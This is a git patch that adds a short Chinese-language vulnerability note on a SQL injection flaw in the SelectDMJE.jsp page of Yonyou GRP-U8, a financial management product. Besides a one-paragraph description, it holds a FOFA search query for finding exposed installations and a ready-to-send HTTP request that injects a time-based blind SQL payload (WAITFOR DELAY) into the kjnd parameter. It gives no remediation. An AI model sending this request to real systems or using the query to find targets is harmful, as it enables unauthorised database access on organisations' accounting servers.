From bc39808c5d79f7cef1ac0779a111d86178f61e2e Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 18 Jan 2024 19:32:00 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BGRP-U8-SelectDMJE.js?=
 =?UTF-8?q?p=5FSQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md

diff --git a/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md b/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md
new file mode 100644
index 0000000..d5a014e
--- /dev/null
+++ b/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md
@@ -0,0 +1,18 @@
+## 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞
+
+用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager，产品分B、C、G三个产品系列，以上受到本次通报漏洞的影响。用友GRP-U8 SelectDMJE.jsp 存在SQL注入漏洞。
+
+## fofa
+```
+app="用友-GRP-U8"
+```
+
+## poc
+```
+GET /u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+Connection: close
+```
+
+